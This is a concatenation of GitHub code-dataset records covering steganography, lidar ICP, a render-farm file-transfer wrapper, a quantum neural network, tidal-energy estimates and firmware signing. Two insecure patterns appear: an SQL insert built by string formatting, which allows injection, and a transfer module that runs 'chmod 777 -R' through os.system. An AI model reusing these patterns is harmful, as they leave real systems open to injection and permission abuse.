conn = sqlite3.connect('db/fullcrimp.db')\n c = conn.cursor()\n\n c.execute(\"\"\"\n INSERT INTO hangboard_sessions\n (edge_size, num_sets, set_hang_time, parent_id) VALUES\n ({0}, {1}, {2}, {3})\n \"\"\".format(self.edge_size, self.num_sets, self.set_hang_time, self.training_session_id))\n\n conn.commit()\n\n\n","repo_name":"Mystiking/FullCrimp","sub_path":"src/HangboardSession.py","file_name":"HangboardSession.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"30535251769","text":"import os\n\nfrom dotenv import load_dotenv\nfrom flask import Flask\n\nfrom .handler import register_logging, register_errors, register_blueprints, \\\n register_commands, register_extensions, register_jinja_filters, \\\n register_tasks, register_token_bucket, register_socketio, register_shared_context\nfrom .settings import config\n\nDOT_ENV = os.path.join(os.path.dirname(os.path.dirname(__file__)), \".flaskenv\")\nload_dotenv(DOT_ENV, override=True)\n\n\ndef create_app():\n app = Flask(__name__, template_folder=\"templates\", static_folder=\"static\")\n app.config.from_object(config[os.environ[\"FLASK_ENV\"]])\n register_shared_context(app)\n register_jinja_filters(app)\n register_socketio(app)\n register_logging(app)\n register_extensions(app)\n register_blueprints(app)\n register_tasks(app)\n register_token_bucket(app)\n register_commands(app)\n register_errors(app)\n return app\n","repo_name":"firefirer1983/superdad","sub_path":"superdad/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18571503574","text":"# Python program implementing Image Steganography\n\n# PIL package allows modification of pixels in an image\nfrom PIL import Image\n\n# Convert encryption data into 8-bit binary\n# create characters using ascii from 8 bit binary provided through manipulation of pixels\ndef generateData(data):\n\n\t\t# creating a list of binary codes from\n\t\t# user inputed data, encrypted into image file\n\t\tnewData = []\n\n\t\tfor i in data:\n\t\t\tnewData.append(format(ord(i), '08b'))\n\t\treturn newData\n\n# Pixels are modified according to the 8 bit binary\n# data and returned as text when decrypted or simply stored in image file when encrypted\ndef modifyPixels(pixels, data):\n\n\tdatalist = generateData(data)\n\tlendata = len(datalist)\n\timageData = iter(pixels)\n\n\tfor i in range(lendata):\n\n\t\t# Extracting 3 pixels at a time 8th bit reads 1 or 0\n # 1 allows the file to keep being read 0 tells it to stop reading\n\t\tpixels = [value for value in imageData.__next__()[:3] +\n\t\t\t\t\t\t\t\timageData.__next__()[:3] +\n\t\t\t\t\t\t\t\timageData.__next__()[:3]]\n\n\t\t# Pixel value is created\n\t\t# odd for 1 and even for 0\n\t\tfor j in range(0, 8):\n\t\t\tif (datalist[i][j] == '0' and pixels[j]% 2 != 0):\n\t\t\t\tpixels[j] -= 1\n\n\t\t\telif (datalist[i][j] == '1' and pixels[j] % 2 == 0):\n\t\t\t\tif(pixels[j] != 0):\n\t\t\t\t\tpixels[j] -= 1\n\t\t\t\telse:\n\t\t\t\t\tpixels[j] += 1\n\t\t\t\t\n\n\t\t# Eighth pixel of every set tells\n\t\t# whether to stop or read further.\n\t\t# 0 means keep reading; 1 means the\n\t\t# message is over.\n\t\tif (i == lendata - 1):\n\t\t\tif (pixels[-1] % 2 == 0):\n\t\t\t\tif(pixels[-1] != 0):\n\t\t\t\t\tpixels[-1] -= 1\n\t\t\t\telse:\n\t\t\t\t\tpixels[-1] += 1\n\n\t\telse:\n\t\t\tif (pixels[-1] % 2 != 0):\n\t\t\t\tpixels[-1] -= 1\n\n\t\tpixels = tuple(pixels)\n\t\tyield pixels[0:3]\n\t\tyield pixels[3:6]\n\t\tyield pixels[6:9]\n\ndef encrypt_enc(newImage, data):\n\tw = newImage.size[0]\n\t(x, y) = (0, 0)\n\n\tfor pixel in modifyPixels(newImage.getdata(), data):\n\n\t\t# Putting modified pixels in the new image\n\t\tnewImage.putpixel((x, y), pixel)\n\t\tif (x == w - 1):\n\t\t\tx = 0\n\t\t\ty += 1\n\t\telse:\n\t\t\tx += 1\n\n# Encode data into image\n# image first is opened\n# calls for user input to add secret message to be encrypted\n# if data is not added for encryption raise exception\n# generate new image with encrypted data\n# create new file with name and extension in working directory\n# new image saved with encrypted data \ndef encrypt():\n\timg = input(\"Enter image name including extension -> \")\n\timage = Image.open(img, 'r')\n\n\tdata = input(\"Enter your secret message : \")\n\tif (len(data) == 0):\n\t\traise ValueError('image empty try again')\n\n\tnewImage = image.copy()\n\tencrypt_enc(newImage, data)\n\n\tnewImageName = input(\"Type the name of encrypted image including extension : \")\n\tnewImage.save(newImageName, str(newImageName.split(\".\")[1].upper()))\n\n# Decode the data in the image\ndef decrypt():\n\timg = input(\"Type encrypted image including extension -> \")\n\timage = Image.open(img, 'r')\n\n\tdata = ''\n\timageData = iter(image.getdata())\n\n\twhile (True):\n\t\tpixels = [value for value in imageData.__next__()[:3] +\n\t\t\t\t\t\t\t\timageData.__next__()[:3] +\n\t\t\t\t\t\t\t\timageData.__next__()[:3]]\n\n\t\t# recreating string of binary data. Going through the binary and reading \n # 8 bits at a time 0 for even 1 for odd and returning the associated ascii value\n\t\tbinaryString = ''\n\n\t\tfor i in pixels[:8]:\n\t\t\tif (i % 2 == 0):\n\t\t\t\tbinaryString += '0'\n\t\t\telse:\n\t\t\t\tbinaryString += '1'\n\n\t\tdata += chr(int(binaryString, 2))\n\t\tif (pixels[-1] % 2 != 0):\n\t\t\treturn data\n\n# Main function prompts user input to either call the encrypt or decrypt functions\n# catch error for invalid user inputs\ndef main():\n\ta = int(input(\"~~ Welcome to Image Encryption Tool ~~\\n\"\n\t\t\t\t\t\t\"1. Encrypt\\n2. Decrypt\\n\"))\n\tif (a == 1):\n\t\tencrypt()\n\n\telif (a == 2):\n\t\tprint(\"secret message : \" + decrypt())\n\telse:\n\t\traise Exception(\"Enter valid input\")\n\n# Driver\nif __name__ == '__main__' :\n\n\t# executing main function\n\tmain()\n","repo_name":"spentc4/Steganography-Final","sub_path":"curran_final_steganography.py","file_name":"curran_final_steganography.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25297703412","text":"import numpy as np\nimport open3d as o3d\nimport os\nfrom scipy.spatial.transform import Rotation as R\n\nfrom chimera_fgo.general import lla_to_ecef, ecef2enu\nfrom chimera_fgo.io import read_lidar_bin, read_gt\nfrom chimera_fgo.registration import initialize_source_and_target, p2pl_ICP_with_covariance\n\nif __name__=='__main__':\n # Load point clouds\n binpath = 'oak/stanford/groups/gracegao/kitti_raw/2011_09_30/2011_09_30_drive_0028_sync/velodyne_points/data'\n #binpath = os.path.join(os.getcwd(), '..', 'data', 'kitti', '2011_09_30_drive_0028_sync', 'velodyne_points', 'data')\n PC_data_all = read_lidar_bin(binpath)\n\n start_idx = 1550\n PC_data = PC_data_all[start_idx:]\n\n # Load ground truth\n gtpath = os.path.join(os.getcwd(), '..', 'data', 'kitti', '2011_09_30_drive_0028_sync', 'oxts', 'data')\n gt_data = read_gt(gtpath)\n gt_data = gt_data[start_idx:]\n lla = gt_data[:,:3] \n\n ref_lla = lla[0]\n ecef = lla_to_ecef(*lla[0])\n gt_ecef = np.zeros((len(lla),3))\n\n for i in range(len(lla)):\n ecef = lla_to_ecef(*lla[i])\n gt_ecef[i] = ecef2enu(ecef[0], ecef[1], ecef[2], ref_lla[0], ref_lla[1], ref_lla[2])\n\n gt_ecef = gt_ecef[:,[1,0,2]]\n\n # Get initial orientation\n heading = gt_data[0][5] # heading angle\n r = R.from_euler('XYZ', [0, 0, heading])\n R_heading = r.as_matrix()\n\n # Run ICP\n N = len(PC_data)\n #N = 1000\n R_abs = R_heading\n t_abs = gt_ecef[0].copy()\n poses = N * [None]\n poses[0] = (R_abs.copy(), t_abs.copy())\n\n lidar_Rs = []\n lidar_ts = []\n covariances = []\n\n for i in range(1,N):\n print(i, \"/\", N)\n trans_init = np.eye(4)\n threshold = 1\n source, target = initialize_source_and_target(PC_data[i], PC_data[i-1])\n reg_p2pl, covariance = p2pl_ICP_with_covariance(source, target, threshold, trans_init)\n R_hat = reg_p2pl.transformation[:3,:3]\n t_hat = reg_p2pl.transformation[:3,3]\n\n lidar_Rs.append(R_hat)\n lidar_ts.append(t_hat)\n covariances.append(covariance)\n\n","repo_name":"Stanford-NavLab/chimera_fgo","sub_path":"scripts/kitti_icp_sherlock.py","file_name":"kitti_icp_sherlock.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31134468101","text":"# -*- coding: utf-8 -*-\n\"\"\"Transfer Module.\n\nExecute the cmd command to make the last asset and\ndownload assets.\n\n\"\"\"\n\n# Import built-in modules\nfrom __future__ import print_function\n\nimport codecs\nimport json\nimport os\nimport sys\n\nfrom rayvision_sync.constants import ENGINE_TYPE, PLATFORM_ALIAS_MAP\nfrom rayvision_sync.exception import UnsupportedEngineType\n\n\nclass RayvisionTransfer(object):\n \"\"\"Transfer including upload files and download files.\"\"\"\n\n def __init__(self, api, config_bid, input_bid, domain, platform, local_os,\n user_id, automatic_line, output_bid=None, manage_task=None,\n transports_json=\"\", transmitter_exe=\"\", internet_provider=\"\",\n ):\n \"\"\"Initialize the configuration of the transfer.\n\n Args:\n config_bid (str): transport configuration id.\n input_bid (str): storage id.\n output_bid (str): storage id.\n domain (str): domain name, like task.renderbus.com\".\n platform (str): platform id, for example: \"2\".\n local_os (str): system name, Only support \"window\" or \"linux\".\n user_id (str): user accound id.\n manage_task (RayvisionManageTask, optional): Instantiated object\n of the management tasks, If it is just uploading, this\n parameter can not be passed. If it is downloaded, this\n parameter must have.\n internet_provider (str): Network provider.\n \"\"\"\n self.api = api\n\n self.config_bid = config_bid\n self.input_bid = input_bid\n self.output_bid = output_bid\n self.domain = domain\n self.platform = platform\n self.local_os = local_os\n self.user_id = user_id\n self.manage_task = manage_task\n self.transports_json = transports_json\n\n self.user_info = {\n 'config_bid': self.config_bid,\n 'input_bid': self.input_bid,\n 'output_bid': self.output_bid,\n 'user_id': self.user_id,\n 'domain': self.domain,\n 'platform': self.platform,\n 'local_os': self.local_os,\n }\n if os.path.exists(transmitter_exe):\n self.transmitter_exe = transmitter_exe\n else:\n self.transmitter_exe = self.init_transmitter()\n if automatic_line:\n self.transport_info = self.parse_service_transfe_line(internet_provider)\n else:\n self.transport_info = self.parse_transports_json(transports_json)\n\n def init_transmitter(self):\n \"\"\"Gets the path of the transfer software.\n\n Args:\n current_dir: transfer base directory.\n\n Returns: transfer software absolute path.\n\n \"\"\"\n current_dir = os.path.dirname(os.path.realpath(__file__))\n if self.local_os == 'windows':\n transmitter_exe = os.path.join(current_dir, 'transmission',\n 'windows',\n 'rayvision_transmitter.exe')\n else:\n transmitter_exe = os.path.join(current_dir, 'transmission',\n \"linux\",\n 'rayvision_transmitter')\n return transmitter_exe\n\n def parse_transports_json(self, transports_json=None, domain=None,\n platform=None):\n \"\"\"Analyze transports.json,obtain transfer server info.\n\n Extract the transmission configuration information of the\n corresponding platform in transports.json.\n\n Args:\n transports_json (str, optional): Path to transfer configuration\n files.\n domain (str, optional): Domain name.\n platform (str, optional): Platform number.\n\n Returns:\n dict: Transfer configuration information\n .e.g:\n {\n \"engine_type\":\"aspera\",\n \"server_name\":\"HKCT\",\n \"server_ip\":\"render-client.raysync.cn\",\n \"server_port\":\"10221\"\n }\n\n \"\"\"\n if not domain:\n domain = self.domain\n if not transports_json:\n current_dir = os.path.dirname(os.path.realpath(__file__))\n self.transports_json = os.path.join(current_dir, 'transmission',\n 'transports.json')\n if 'foxrenderfarm' in domain:\n key_first_half = 'foxrenderfarm'\n else:\n key_first_half = 'renderbus'\n\n if not platform:\n platform = self.platform\n key_second_half = self._get_key_second_half(platform)\n\n if key_second_half == 'default':\n key = key_second_half\n else:\n key = '%s_%s' % (key_first_half, key_second_half)\n\n with codecs.open(self.transports_json, 'r', 'utf-8') as f_transports:\n transports_info = json.load(f_transports)\n return transports_info[key]\n\n def parse_service_transfe_line(self, internet_provider=None):\n transfer_lines = self.api.transmit.get_transfer_config()\n if not transfer_lines:\n raise EnvironmentError(\"Unable to obtain transmission line\")\n resp_engine_lines = transfer_lines.get(\"resqEngines\")\n data = dict()\n for engine_info in resp_engine_lines:\n resp_line = engine_info[\"respTaskEngineLines\"]\n for line in resp_line:\n if internet_provider:\n if line[\"name\"] == internet_provider:\n data.update({\n engine_info[\"engineName\"].lower(): {\n \"server_name\": line[\"name\"],\n \"server_ip\": line[\"server\"],\n \"server_port\": line[\"port\"],\n }\n })\n break\n else:\n if line[\"isDefault\"]:\n data.update({\n engine_info[\"engineName\"].lower(): {\n \"server_name\": line[\"name\"],\n \"server_ip\": line[\"server\"],\n \"server_port\": line[\"port\"],\n }\n })\n break\n return data\n\n @staticmethod\n def _get_key_second_half(platform):\n \"\"\"Get the key corresponding to the platform number.\n\n Returns:\n key_second_half(str): Representative submits tasks to several\n platforms.\n\n \"\"\"\n return PLATFORM_ALIAS_MAP[platform]\n\n\n def create_cmd(self, cmd_params, db_ini_path=None, engine_type=\"aspera\", server_ip=None, server_port=None,\n main_user_id=None, main_input_bid=None, network_mode=0):\n \"\"\"Splice a cmd command.\n\n Args:\n cmd_params (list): Parameters required by the cmd command.\n Examples::\n\n [\n transmit_type, # Transmission type\n local_path, # Local file path\n output_file_name, # File path uploaded to the server\n max_speed, # Maximum transfer speed of upload\n 'true', # Whether to save the path\n 'output_bid', # Transfer id\n ]\n\n db_ini_path (str): Database path.\n engine_type (str, optional): set engine type, support \"aspera\" and \"raysync\", Default \"aspera\".\n server_ip (str, optional): transmit server host,\n if not set, it is obtained from the default transport profile.\n server_port (str, optional): transmit server port,\n if not set, it is obtained from the default transport profile.\n main_user_id (str): Main account user id.\n main_input_bid (str): Main account input bid.\n network_mode (int): network mode: 0: auto selected, default;\n 1: tcp;\n 2: udp;\n\n Returns:\n str: Cmd command.\n\n \"\"\"\n if not sys.platform.startswith('win'):\n os.environ[\"LD_LIBRARY_PATH\"] = os.path.dirname(self.transmitter_exe)\n chmod_str = \"chmod 777 -R {}/*\".format(os.path.dirname(self.transmitter_exe))\n os.system(chmod_str)\n if not bool(engine_type):\n engine_type = \"aspera\"\n if engine_type not in ENGINE_TYPE:\n msg = \"{} is not a supported transport engine, \" \\\n \"currently only support 'aspera' and 'raysync'\".format(engine_type)\n raise UnsupportedEngineType(msg)\n transmit_cmd = ('echo y|\"{exePath}\" -E \"{engineType}\"'\n ' -H \"{serverIp}\" -P \"{serverPort}\" -S \"{download_id}\"'\n ' -U \"{userId}\" -T \"{transmit_type}\" -L \"{local_path}\"'\n ' -R \"{server_path}\" -r \"{maxConnectFailureCount}\"'\n ' -K \"{keep_path}\" -s \"{max_speed}\" -C \"{database_config_path}\" -p {network_mode}'\n ' ').format(\n exePath=self.transmitter_exe,\n engineType=engine_type,\n serverIp=server_ip if server_ip else self.transport_info[engine_type]['server_ip'],\n serverPort=server_port if server_port else self.transport_info[engine_type]['server_port'],\n download_id=main_input_bid if main_input_bid else self.user_info[cmd_params[5]],\n userId=main_user_id if main_user_id else self.user_id,\n transmit_type=cmd_params[0],\n local_path=cmd_params[1],\n server_path=cmd_params[2],\n maxConnectFailureCount='2', # default is 2.\n keep_path=cmd_params[4],\n max_speed=cmd_params[3],\n database_config_path=db_ini_path,\n network_mode=int(network_mode))\n return transmit_cmd\n","repo_name":"renderbus/rayvision_sync","sub_path":"rayvision_sync/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":10072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6131181629","text":"\nimport numpy as np\nfrom qiskit import Aer\nfrom qiskit.circuit import QuantumCircuit, QuantumRegister, ClassicalRegister\nfrom qiskit.extensions import HamiltonianGate\n# Quantum Deep Neural Network Layer\nclass QDNNL():\n def __init__(self, num_qubits, D_epsilon, D_gamma, hamiltonians=[np.eye(4)]):\n self.num_qubits = num_qubits\n self.D_epsilon = D_epsilon\n self.D_gamma = D_gamma\n self.hamiltonians = [HamiltonianGate(h, 1) for h in hamiltonians]\n # inputs from most recent forward propogation\n self.inputs = None\n # parameters to encoder, stored as one dimensional vector\n # size will be: num_qubits *(2 + self.D_epsilon * 3)\n self.encoder_parameters = list()\n # parameters of transformer circuit, stored as one dimensional vector\n # size will be: num_qubits *(self.D_gamma * 3 + 2)\n self.transformer_parameters = list()\n # initialize quantum objects\n self.circuit : QuantumCircuit= QuantumCircuit(QuantumRegister(num_qubits), ClassicalRegister(num_qubits))\n self.backend = Aer.get_backend('statevector_simulator')\n # append encoder to circuit\n self.circuit = self.circuit.compose(self.build_encoder(),range(self.num_qubits))\n # append transformer to circuit\n self.circuit = self.circuit.compose(self.build_transformer(),range(self.num_qubits))\n # create all output circuits\n self.complete_circuits = list()\n for hamiltonian in self.hamiltonians:\n self.complete_circuits.append(self.circuit.compose(self.build_measurement(hamiltonian), range(self.num_qubits)))\n \n \n def build_ent(self):\n ent = QuantumCircuit(self.num_qubits)\n for qubit in range(1, self.num_qubits):\n ent.cx(qubit-1, qubit)\n ent.cx(self.num_qubits - 1, 0)\n return ent.to_instruction(label=\"Ent\")\n \n \n \"\"\"\n create encoder circuit\n :param De: an integer that indicates how many times a part of this circuit is repeated\n :return: encoder quantum circuit\n :rtype: Instruction\n \"\"\"\n def build_encoder(self):\n encoder = QuantumCircuit(self.num_qubits)\n \n encoder.x(range(self.num_qubits))\n encoder.z(range(self.num_qubits))\n encoder.barrier(range(self.num_qubits))\n for _ in range(self.D_epsilon):\n encoder = encoder.compose(self.build_ent(), range(self.num_qubits))\n encoder.z(range(self.num_qubits))\n encoder.x(range(self.num_qubits))\n encoder.z(range(self.num_qubits))\n encoder.barrier(range(self.num_qubits))\n \n return encoder.to_instruction(label=\"encoder|D_E={}\".format(self.D_epsilon))\n \n def build_transformer(self):\n transformer = QuantumCircuit(self.num_qubits)\n \n for _ in range(self.D_gamma):\n transformer = transformer.compose(self.build_ent(), range(self.num_qubits))\n transformer.z(range(self.num_qubits))\n transformer.x(range(self.num_qubits))\n transformer.z(range(self.num_qubits))\n transformer.barrier(range(self.num_qubits))\n \n transformer.x(range(self.num_qubits))\n transformer.z(range(self.num_qubits))\n \n return transformer.to_instruction(label=\"transformer|D_Gamma={}\".format(self.D_gamma))\n \n def build_measurement(self, hamiltonian):\n measurement = QuantumCircuit(self.num_qubits)\n measurement = measurement.compose(hamiltonian)\n measurement.measure_all()\n return measurement.to_instruction(label=\"measurement\")\n \n def forward(self, input):\n # check that all input values are zeros or ones\n for i0, i1 in zip((input > 1), input < 0):\n assert i0 == False and i1 == False\n # initialize the state of the qubits in the encoder\n self.circuit.initialize(input)\n # execute job on simulator for each complete circuit\n results = list()\n for complete_circuit in self.complete_circuits:\n results.append(self.backend.run(complete_circuit, shots=100).result())\n for result in results:\n print(result)\n \n def calculate_circuit_loss(self, vector):\n deltas = np.zeros(len(vector))\n # iterate through parameters in encoder\n for i in range(len(vector)):\n vector[i] += np.pi / 2\n h_plus = self.forward(self.inputs)\n vector[i] -= np.pi\n h_minus = self.forward(self.inputs)\n deltas[i] = (h_plus - h_minus) / 2.0\n return deltas\n \n def backpropogate_error(self, loss):\n # calculate output loss w.r.t. input\n encoder_deltas = self.calculate_circuit_loss(self.encoder_parameters)\n # iterate thorugh inputs, assign gradient for each\n transformer_deltas = self.calculate_circuit_loss(self.transformer_parameters)\n # loss with respect to inputs\n loss_inputs = loss * encoder_deltas\n # loss with respect to parameters\n loss_parameters = loss * transformer_deltas\n return loss_inputs, loss_parameters\n \nclass InputLayer(QDNNL):\n def __init__(self, num_qubits, D_epsilon, D_gamma):\n super().__init__(num_qubits, D_epsilon, D_gamma)\n # prepare quantum circuit\n self.input_layer = QuantumCircuit(QuantumRegister(num_qubits), ClassicalRegister(num_qubits))\n # add encoder circuit to layer\n self.input_layer = self.input_layer.compose(self.build_encoder(),range(self.num_qubits))\n self.input_layer = self.input_layer.compose(self.build_transformer(),range(self.num_qubits))\n \n\n\nclass QDNN():\n \n def __init__(self) -> None:\n # fixed theta used in encoding circuits\n self.theta = np.pi / 4\n pass\n \n def calculate_loss(self, output, target, type=\"MSE\"):\n if type == \"MSE\":\n return np.sum(((output - target) ** 2))/len(output)","repo_name":"DRosen766/NeuralNets","sub_path":"QDNN.py","file_name":"QDNN.py","file_ext":"py","file_size_in_byte":5989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19219449436","text":"print(\"start\")\nimport numpy as np\nimport cv2\nimport os\nimport random\nimport math\nimport copy\nimport os\n\ndef sol(enc_pic,dec_pic,output_txt):\n answer2=[]\n source_img = cv2.imread(enc_pic)\n #answer = [[0 for j in range(N)] for i in range(M)]\n M=len(source_img)\n N=len(source_img[0])\n\n K=24\n if len(source_img.shape) == 2:\n K=8\n print(M,N,K)\n bz=24\n rz=12\n cz=int((rz*M)/math.gcd(M,N))\n bx=25\n rx=16\n cx=int((rx*M)/math.gcd(M,K))\n by=27\n ry=18\n cy=int((ry*N)/math.gcd(K,N))\n iter_num=5\n answer2=copy.deepcopy(source_img)\n Sz_inverse_matric=[[1,-bz,0],[-cz,1,0],[0,0,1]]\n Sx_inverse_matric=[[1,0,0],[0,1,-bx],[0,-cx,1]]\n Sy_inverse_matric=[[1,0,-cy],[0,1,0],[-by,0,1]]\n print(Sz_inverse_matric)\n print(Sx_inverse_matric)\n print(Sy_inverse_matric)\n for i in range(M):\n ori=i\n for j in range(N):\n orj=j\n output=[i,j,48]\n \n for i in range(iter_num):\n #print(width)\n output = np.dot(Sy_inverse_matric, output)\n \n output[0]=output[0]%N\n output[1]=output[1]\n output[2]=output[2]%K\n \n output = np.dot(Sx_inverse_matric, output)\n output[0]=output[0] \n output[1]=output[1]%M\n output[2]=output[2]%K\n\n output = np.dot(Sz_inverse_matric, output)\n output[0]=output[0]%N\n output[1]=output[1]%M\n output[2]=output[2]\n #k=input()\n answer2[output[1]][output[0]]=source_img[ori][orj] \n answer2=np.array(answer2) \n cv2.imwrite(dec_pic,answer2)\n\n \"\"\"\n f = open(output_txt, 'w')\n f.write(\"N =\"+str(N) +\"\\n\")\n f.write(\"M =\"+str(M) +\"\\n\")\n f.write(\"gcd(M,N) =\"+str(math.gcd(M,N)) +\"\\n\")\n f.write(\"gcd(M,K) =\"+str(math.gcd(M,K)) +\"\\n\")\n f.write(\"gcd(K,N) =\"+str(math.gcd(K,N)) +\"\\n\")\n f.write(\"bx =\"+str(bx) +\"\\n\")\n f.write(\"by =\"+str(by) +\"\\n\")\n f.write(\"bz =\"+str(bz) +\"\\n\")\n f.write(\"rx =\"+str(rx) +\"\\n\")\n f.write(\"ry =\"+str(ry) +\"\\n\")\n f.write(\"rz =\"+str(rz) +\"\\n\")\n f.write(\"cx =\"+str(cx) +\"\\n\")\n f.write(\"cy =\"+str(cy) +\"\\n\")\n f.write(\"cz =\"+str(cz) +\"\\n\")\"\"\"\n print(\"finish decrypt\")\nif __name__ == \"__main__\":\n #sol2(\"./source/kodim04.png\",\"./encryp/kodim04.png\",\"./decryp/kodim04.png\")\n #sol2(\"./source/Boat.png\",\"./encryp/Boat.png\",\"./decryp/Boat.png\")\n source_path = \"./source/\"\n enc_path = \"./encryp\"\n dec_path = \"./decryp\"\n dirs = os.listdir( enc_path )\n for i in dirs:\n sol(\"./encryp/\"+i,\"./decryp/\"+i,\"./parame/\"+i[:-3]+\"txt\")\n #source_img = cv2.imread(\"./source/kodim04.png\")","repo_name":"leonardo-lin/color-transformer","sub_path":"hw12/7111056081-06-3D-NEAT_dec.py","file_name":"7111056081-06-3D-NEAT_dec.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38475534585","text":"\"\"\"\nCreated on Tue Oct 27 12:23:22 2020\n\n@author: jeff\n\"\"\"\n\n# This script contains calculations pertaining to possibilities of\n# installation for tidal energy infrastructure in Northeastern region of the\n# United States. It includes potential power-production and economic analyses.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nrho = 1000 # density of water [kg/m^3]\ng = 9.81 # acceleration due to gravity [m/s^2]\n\nA = 10 # area of interest, [mi^2]\nA = A*5280**2/3.281**2 # [mi^2] -> [ft^2] -> [m^2]\n\n# tidal range info\n # https://upload.wikimedia.org/wikipedia/commons/5/5e/M2_tidal_constituent.jpg\nz0 = 100 # tidal range [cm]\nz0 = z0/100 # [cm] -> [m]\nt_T = 6.2 # time period between hi & lo tide [hrs] NOTE: _T refers to natural Tidal cycle\nt_T = t_T*60**2 # [hrs] -> [s]\n\n# define geometry of system\n# assuming small vertical hole\n# https://www.engineeringtoolbox.com/flow-liquid-water-tank-d_1753.html\n# h1 = H, h2 = h (in figure)\nl = 1 # length of hole [m]\nh = 0.6 # height of hole [m]\nA = h*l # hole area [m^2]\nh1 = z0 - h/2 # height between center of hole and top of water\nh2 = h/2 # height between center of hole and floor\nh_checc_is_z = h1+h2\n\n## P0 = rho*g*z # calculate hydrostatic pressure at lo tide due to difference in height [N/m^2]\n#V = A*z0 # volume of water [m^3]\n#m = rho*V # mass of water [kg]\n#pe = m*g*z0 # potential energy of water [J]\n#P = pe/t_T # very, very rough estimate of power produced during one tide [J/s] [W]\n#P = P/1000**2 # [W] -> [MW]\n\n#Cv = 0.97 # velocity coeff\n#Cd = 1 # discharge coeff\n\n#v = Cv*(2*g*h1)**0.5 # outlet velocity of water [m/s]\n#dV_dt = Cd*A*(2*g*h1)**0.5 # volume flow rate [m^3/s]\n#F = rho*dV_dt*v # reaction force\n\n# generate diagram\nx = [0,0,1,1]\ny = [0,z0,0,z0]\nplt.plot(x,y,'ro')\nplt.plot(x[1],h,'co')\nplt.plot(x[1],0,'co')\nplt.title('Diagram')\nplt.xlabel('(arbitrary length scale)')\nplt.ylabel('Height [m]')\nplt.show()\n\n\n# time begins at hi tide\ndt = 120 # time increment [s]\nsteps = t_T/dt # number of time steps\nsteps = int(steps) # convert from type float to integer\ndz_dt_T = z0/t_T # rate of change in tide over time [m/s]\n\nt = [0]\nz = [z0]\nz_T = [z0]\nV = [A*z0]\nm = [rho*A*z0] # m = rho*V\npe = [rho*A*z0*g*z0] # pe = m*g*z0\nP = [pe/dt/1000**2] # [MW]\n\n\nfor i in range(steps):\n #print(i)\n t.append(dt*i)\n z_T.append\n \n \n \n \n \n \n ","repo_name":"JiffiPop/PYTHON--Side-Projects","sub_path":"Tidal Energy Trade Study/study_1_time_step.py","file_name":"study_1_time_step.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23122539820","text":"import stat\nimport shutil\nfrom xml.etree import ElementTree\nfrom tegrasign_v3_util import *\n\ndef compute_sha(type, filename, offset, length, blockSize=\"0\"):\n if type == 'sha256':\n return do_sha((256/8), filename, offset, length, blockSize)\n else:\n return do_sha((512/8), filename, offset, length, blockSize)\n\n'''\nPerform based on the node define\n\n'''\ndef perform_sha(filename, shanode):\n if (shanode == None):\n return\n sha_type = shanode.get('digest_type')\n dest_file = shanode.get('digest_file')\n length = int (shanode.get('length') if shanode.get('length') else 0)\n offset = int (shanode.get('offset') if shanode.get('offset') else 0)\n\n compute_sha(sha_type, filename, offset, length)\n if not os.path.isfile(dest_file):\n raise tegrasign_exception('Could not find ' + dest_file)\n\n'''\nThis parses the xml to sign list of specified files\nExample xml file format\n\n \n \n \n \n\n'''\ndef sign_files_internal(p_keylist, filenode, pkh, mont, sha_type, iv):\n\n filename = filenode.get('name')\n if filename == None:\n info_print('***Missing file name*** ')\n return exit_routine()\n\n sign_fh = open_file(filename, 'rb')\n buff_data = sign_fh.read()\n file_size = len(buff_data)\n sign_fh.close()\n\n length = int (filenode.get('length') if filenode.get('length') else 0)\n offset = int (filenode.get('offset') if filenode.get('offset') else 0)\n key_index = int (filenode.get('key_index') if filenode.get('key_index') else 0)\n\n length = length if length > 0 else file_size - offset\n offset = offset if offset > 0 else 0\n\n length=int(length)\n\n if file_size < offset:\n length = 0\n info_print('Warning: Offset %d is more than file Size %d for %s' % (offset, file_size, filename))\n return exit_routine()\n\n if (offset + length) > file_size:\n info_print('Warning: Offset %d + Length %d is greater than file Size %d for %s' % (offset, length, file_size, filename))\n return exit_routine()\n\n if key_index >= MAX_KEY_LIST:\n info_print('Warning: Key at index %d is not provided ' %(key_index))\n return exit_routine()\n\n buff_to_sign = buff_data[offset : offset + length]\n\n if p_keylist[key_index].mode == NvTegraSign_SBK:\n\n sbknode = filenode.find('sbk')\n if sbknode is None:\n info_print('sbk tag is not present.')\n return exit_routine()\n\n skip_enc = 0 if int(sbknode.get('encrypt')) >=1 else 1\n do_sign = 1 if int(sbknode.get('sign')) >=1 else 0\n enc_file_name = sbknode.get('encrypt_file')\n hash_file_name = sbknode.get('hash')\n\n NumAesBlocks = int(length/AES_128_HASH_BLOCK_LEN)\n length = int(NumAesBlocks * AES_128_HASH_BLOCK_LEN)\n\n buff_hash = '0' * AES_128_HASH_BLOCK_LEN\n buff_enc = bytearray(buff_to_sign)\n\n if (skip_enc or is_zero_aes(p_keylist[key_index])):\n info_print('Skipping encryption: ' + filename, True)\n else:\n buff_enc = do_aes_cbc(buff_to_sign, length, p_keylist[key_index], iv)\n\n if do_sign:\n buff_hash = do_aes_cmac(buff_enc, length, p_keylist[key_index])\n\n buff_data = buff_data[0:int(offset)] + buff_enc + buff_data[int(offset) + int(length):]\n\n # save encryption to *_encrypt.* file\n enc_fh = open_file(enc_file_name, 'wb')\n write_file(enc_fh, buff_data)\n enc_fh.close()\n\n # save 